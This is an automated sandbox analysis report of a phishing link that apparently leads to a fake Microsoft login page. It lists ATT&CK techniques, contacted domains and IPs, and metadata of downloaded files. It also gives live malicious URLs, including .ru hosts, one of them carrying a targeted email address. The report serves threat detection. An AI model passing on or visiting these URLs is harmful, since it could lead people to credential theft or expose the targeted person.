Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation3
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx80%Avira URL Cloudsafe
https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8100%SlashNextCredential Stealing type: Phishing & Social Engineering
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru/aRfKqGivICwMfkvMblhotmkCKTJPGIIMLUXKGZWRHMEJQTKQBBOQYFNUUNOTELHTTCK0%Avira URL Cloudsafe
https://hello.com#Xuser0%Avira URL Cloudsafe
https://gimd.lamantatio.ru/favicon.ico0%Avira URL Cloudsafe
https://xre.wzr.mybluehostin.me/favicon.ico0%Avira URL Cloudsafe
https://hello.com#X0%Avira URL Cloudsafe
https://gimd.lamantatio.ru/ZSei/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
u1427642.ct.sendgrid.net
167.89.118.23
truefalse
    unknown
    xre.wzr.mybluehostin.me
    162.214.80.73
    truetrue
      unknown
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru
        104.21.112.1
        truefalse
          unknown
          code.jquery.com
          151.101.2.137
          truefalse
            high
            cdnjs.cloudflare.com
            104.17.24.14
            truefalse
              high
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                s-part-0017.t-0009.t-msedge.net
                13.107.246.45
                truefalse
                  high
                  sni1gl.wpc.omegacdn.net
                  152.199.21.175
                  truefalse
                    high
                    www.google.com
                    142.250.185.196
                    truefalse
                      high
                      gimd.lamantatio.ru
                      104.21.32.1
                      truetrue
                        unknown
                        www.office.com
                        unknown
                        unknownfalse
                          high
                          aadcdn.msftauth.net
                          unknown
                          unknownfalse
                            high
                            login.microsoftonline.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://gimd.lamantatio.ru/favicon.icofalse
                              • Avira URL Cloud: safe
                              unknown
                              https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/1q6ex/0x4AAAAAAA1mbxTaRk7hdxV-/auto/fbE/normal/auto/false
                                  high
                                  https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                      high
                                      https://gimd.lamantatio.ru/ZSei/true
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.jsfalse
                                        high
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fdce2128ada41f5&lang=autofalse
                                          high
                                          https://xre.wzr.mybluehostin.me/wp/00x376n43jd83449dhn938380-2jsntrue
                                            unknown
                                            https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8true
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8fdce2128ada41f5/1736178831078/8700c439989e41dbd7c97c2a7e7c33cbc8c768735eb04740b5da280789dc698f/6I2B-pjWRaBgr7qfalse
                                                high
                                                https://xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ru/aRfKqGivICwMfkvMblhotmkCKTJPGIIMLUXKGZWRHMEJQTKQBBOQYFNUUNOTELHTTCKfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fdce2128ada41f5/1736178831075/-I52yKHnGnwtVFmfalse
                                                  high
                                                  https://xre.wzr.mybluehostin.me/favicon.icofalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://a.nel.cloudflare.com/report/v4?s=HdpIZKKqqx11o5ZVaW2tlnX59dKgCqnlnHzP4yrnJFctlnFm6CCmxAPzbb3NWKTe0e4MkC6pxUuwDvB1NxeaHuGeXHA%2FyJFM2iGDrQNYv%2FXKl%2FuquQXc2I8Fgo7fLA%3D%3Dfalse
                                                    high
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/2107253157:1736176446:TMvLSYbT8vPcOi1Ifdtwx5vV_ngLdJuCO6zr7ZzUf20/8fdce2128ada41f5/.wikaeMEd8mK1Oc7dG8c8h4xHhnK8Phr5lO.zmEbd8s-1736178829-1.1.1.1-i1sn.Pdwp4FePG5V5eJspdkjcJ6jDjNn60IHbxUTxEugw2h9wRfI0KDBXWk_pDw0false
                                                      high
                                                      https://gimd.lamantatio.ru/ZSei/#Xcydmg2@nooa.orgtrue
                                                        unknown
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://login.microsoftonline.comchromecache_75.2.dr, chromecache_85.2.drfalse
                                                          high
                                                          https://login.windows-ppe.netchromecache_75.2.dr, chromecache_85.2.drfalse
                                                            high
                                                            https://hello.com#Xchromecache_78.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://hello.com#Xuserchromecache_78.2.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            104.18.94.41
                                                            challenges.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.21.112.1
                                                            xjjd3dlv9wlu073ipsdppi0oqt2jogok8v7diqn7clucolkwlb.gageodeg.ruUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            151.101.66.137
                                                            unknownUnited States
                                                            54113FASTLYUSfalse
                                                            35.190.80.1
                                                            a.nel.cloudflare.comUnited States
                                                            15169GOOGLEUSfalse
                                                            104.17.24.14
                                                            cdnjs.cloudflare.comUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            104.21.32.1
                                                            gimd.lamantatio.ruUnited States
                                                            13335CLOUDFLARENETUStrue
                                                            162.214.80.73
                                                            xre.wzr.mybluehostin.meUnited States
                                                            46606UNIFIEDLAYER-AS-1UStrue
                                                            104.18.95.41
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            167.89.118.23
                                                            u1427642.ct.sendgrid.netUnited States
                                                            11377SENDGRIDUSfalse
                                                            151.101.2.137
                                                            code.jquery.comUnited States
                                                            54113FASTLYUSfalse
                                                            239.255.255.250
                                                            unknownReserved
                                                            unknownunknownfalse
                                                            142.250.185.196
                                                            www.google.comUnited States
                                                            15169GOOGLEUSfalse
                                                            104.17.25.14
                                                            unknownUnited States
                                                            13335CLOUDFLARENETUSfalse
                                                            IP
                                                            192.168.2.4
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1584867
                                                            Start date and time:2025-01-06 16:52:31 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 3m 7s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:browseurl.jbs
                                                            Sample URL:https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:8
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal68.phis.win@22/74@36/14
                                                            EGA Information:Failed
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 142.250.185.195, 142.250.185.174, 64.233.166.84, 142.250.185.142, 142.250.184.238, 142.250.185.234, 142.250.186.170, 142.250.186.106, 142.250.186.42, 142.250.184.202, 142.250.185.170, 142.250.186.74, 142.250.185.202, 142.250.181.234, 142.250.185.106, 216.58.206.42, 142.250.186.138, 142.250.185.138, 142.250.74.202, 172.217.18.10, 172.217.16.138, 217.20.57.21, 192.229.221.95, 142.250.181.238, 142.250.185.110, 40.126.32.72, 40.126.32.74, 20.190.160.17, 20.190.160.20, 20.190.160.22, 40.126.32.68, 40.126.32.136, 40.126.32.140, 13.107.6.156, 20.190.159.4, 20.190.159.71, 20.190.159.0, 40.126.31.71, 20.190.159.23, 20.190.159.75, 40.126.31.73, 20.190.159.68, 40.126.31.69, 20.190.159.2, 172.217.23.106, 172.217.18.106, 142.250.185.74, 142.250.184.234, 216.58.206.74, 13.69.116.109, 52.178.17.234, 172.217.16.195, 142.250.74.206, 184.28.90.27, 20.12.23.50, 13.107.246.45
                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, home-office365-com.b-0004.b-msedge.net, ak.privatelink.msidentity.com, onedscolprdweu12.westeurope.cloudapp.azure.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, onedscolprdweu11.westeurope.cloudapp.azure.com, update.googleapis.com, login.mso.msidentity.com, www.tm.ak.prd.aadg.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.akadns.net, b-0004.b-msedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, eu.events.data.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net, eu-mobile.events.data.microsoft.c
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: https://u1427642.ct.sendgrid.net/ss/c/u001.FNsPiHUBxMFL4Ws_sT4ClbcHyliF9aYYaCWsJtTBDNtLQl9ZlDrQgriglBxgGE9RruWvR9yDlYrq9sYDXn9m2QBHZNBT8lOXoCfvqrsEWDs/4cw/m3JxW_wISSqopMaBzhDAkg/h0/h001.ecTtgKjf7ojZqznHApcdI1yRZPedj7DDFJ38_Fw-Xx8
                                                            No simulations
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            No context
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                            Category:downloaded
                                                            Size (bytes):17174
                                                            Entropy (8bit):2.9129715116732746
                                                            Encrypted:false
                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (47520)
                                                            Category:dropped
                                                            Size (bytes):47521
                                                            Entropy (8bit):5.398500199255723
                                                            Encrypted:false
                                                            SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                            MD5:301F68F3D8317AB22D4021E266C9A853
                                                            SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                            SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                            SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:PNG image data, 42 x 21, 8-bit/color RGB, non-interlaced
                                                            Category:downloaded
                                                            Size (bytes):61
                                                            Entropy (8bit):4.068159130770307
                                                            Encrypted:false
                                                            SSDEEP:3:yionv//thPlglOKkxl/k4E08up:6v/lhP+OKk7Tp
                                                            MD5:2FE53B18BC297082790C4789F372DB25
                                                            SHA1:B7A69D66FD2A1EED4EE888AA258AC7054ADF6247
                                                            SHA-256:195D917DBE8BF60C117F0B2051CBAF63E50C45197E5C5A9EDE2E39073150B122
                                                            SHA-512:30FDE3C53DD25339ADC47455DB5A8116C0A93F13193B5DCF1A197860257F878D599493A140AB068D8B03429DC2DCA91AC7CABD9A87C0F0FD6B6097A07CD6047B
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8fdce2128ada41f5/1736178831075/-I52yKHnGnwtVFm
                                                            Preview:.PNG........IHDR...*............t....IDAT.....$.....IEND.B`.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                            Category:dropped
                                                            Size (bytes):16345
                                                            Entropy (8bit):7.98960525258912
                                                            Encrypted:false
                                                            SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                            MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                            SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                            SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                            SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                            Category:downloaded
                                                            Size (bytes):673
                                                            Entropy (8bit):7.6596900876595075
                                                            Encrypted:false
                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 352 x 3
                                                            Category:dropped
                                                            Size (bytes):2672
                                                            Entropy (8bit):6.640973516071413
                                                            Encrypted:false
                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:ASCII text, with very long lines (47520)
                                                            Category:downloaded
                                                            Size (bytes):47521
                                                            Entropy (8bit):5.398500199255723
                                                            Encrypted:false
                                                            SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                            MD5:301F68F3D8317AB22D4021E266C9A853
                                                            SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                            SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                            SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://challenges.cloudflare.com/turnstile/v0/g/849bfe45bf45/api.js
                                                            Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113424
                                                            Category:downloaded
                                                            Size (bytes):20410
                                                            Entropy (8bit):7.980582012022051
                                                            Encrypted:false
                                                            SSDEEP:384:8RvmaMFysnOXZ2m9zM+udO6GGUpeAU02oDGnN5EsQwWUQGTS8r2k:8pmm7ZFM+ObGGUIjN5PJV3Tp
                                                            MD5:3BA4D76A17ADD0A6C34EE696F28C8541
                                                            SHA1:5E8A4B8334539A7EAB798A7799F6E232016CB263
                                                            SHA-256:17D6FF63DD857A72F37292B5906B40DC087EA27D7B1DEFCFA6DD1BA82AEA0B59
                                                            SHA-512:8DA16A9759BB68A6B408F9F274B882ABB3EE7BA19F888448E495B721094BDB2CE5664E9A26BAE306A00491235EB94C143E53F618CCD6D50307C3C7F2EF1B4455
                                                            Malicious:false
                                                            Reputation:low
                                                            URL:https://aadcdn.msauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_81imvbluez-v5hbzpkxfcg2.css
                                                            Preview:...........}k..6..w...R..J.H=GSI..x.9...}T*.....)Q..f<...~.F.h..x..{+.-.....h..n....</v.ev......W.,.bU..rW.I...0x...C..2...6]..W_......../x.........~.z.}.|.#x......Ag*O.|XgU...4 .^'U...mP.A.].Z.U.!..Y.......:.ve.?.!..d.N...xJ...mR......0.@p...lKr/...E.-. .....|l.4.o.i.......L.iF..T{.n....2....VEY.y=..=..T+V./.b....\....7.sH.w{.h.....!.."F.k.!.......d...mS.rh.&G.../..h&..RE"!.A/.......A....L...8.q.M...t[...R...>.6;R..^.Vu..9.[F........>A.:HT}w]......2........p......'T.^]}.^..yJ>.<..pq..h.|..j....j.x..-...c...f...=".)..U.X'.M..l.]ZVtl\.I..}.0.~B0Y'.N...E.4.Xd..e...a.........."..9+d.&..l.$E..R.u.g.Q..w&...~I. .y..D.4;..'.."-.....b...)k.n.M...,3J.z_..&2f.h;.&.R.y..P..X.....\P....*.r...B.$........<....H5.M.."'#.6mQl..mQ5.=.\...O.....^..jM..u*.F..Oh.lNI..j..T..u...I..._........{.\...{..._|..={O..z..>......x..5Q.D7?{...^...^.......o.=.z......v......z.C...Gtw...0!..M@....^...^.x..G....W...{...)..y.<c3...^>{......7._..'d__...;R.
                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            File Type:GIF image data, version 89a, 352 x 3
                                                            Category:downloaded
                                                            Size (bytes):2672
                                                            Entropy (8bit):6.640973516071413
                                                            Encrypted:false
